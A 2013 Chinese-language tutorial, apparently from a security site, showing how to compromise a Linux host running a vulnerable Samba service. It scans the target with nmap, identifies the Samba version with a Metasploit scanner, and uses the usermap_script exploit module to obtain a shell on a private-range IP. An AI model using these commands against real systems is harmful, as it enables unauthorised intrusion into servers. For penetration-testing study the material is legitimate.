热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

samba服务漏洞入侵linux主机

发布时间:2013-03-28 23:32文章来源:网络文章作者:阿德马 点击次数:
摘要:Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba 漏洞 入侵进入远程linux主机. step1) 首先要扫描目标主机上开放的端口和服务,用nmap,命令如下: nm...

Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机.

step1)首先要扫描目标主机上开放的端口和服务,用nmap,命令如下:

nmap -sS -Pn -A 192.168.2.142

samba服务远程溢出漏洞利用

step2)发现主机上开放的139,445端口之后,说明该主机有可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话,需要用到metasploit.

step3)打开metasploit之后需要先判断samba的版本,命令如下:

-msf> search scanner/samba 

这条命令用来查找samba相关exploit参数

samba服务远程溢出漏洞利用

step4)然后使用如下命令来定义要扫描samba的版本所用到的exploits参数。

msf> use auxiliary/scanner/smb/smb_version

msfauxiliary(smb_version) > set RHOSTS 192.168.2.142 

这条命令定义你将要扫描samba版本的远程主机的IP地址.

exploit

该命令将开始漏洞利用

samba服务远程溢出漏洞利用

step5)发现samba版本之后,我们需要进一步利用来入侵进入到远程linux主机

msf> use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set RHOST 192.168.2.142

msf exploit(usermap_script) > exploit

执行完成以上命令如图所示,成功创建了shell 会话.

samba服务远程溢出漏洞利用

标签分类:

上一篇:hash传递入侵 -直接登陆windows
下一篇:攻击ASP中的COM组件